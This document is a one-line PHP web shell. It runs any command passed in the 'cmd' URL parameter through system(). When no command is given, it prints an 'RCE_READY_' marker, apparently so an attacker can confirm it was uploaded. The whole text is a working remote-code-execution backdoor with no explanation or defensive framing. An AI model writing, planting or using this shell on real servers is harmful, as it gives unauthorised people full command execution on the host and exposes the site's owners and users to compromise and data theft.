<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } else { echo "RCE_READY_" . uniqid(); } ?>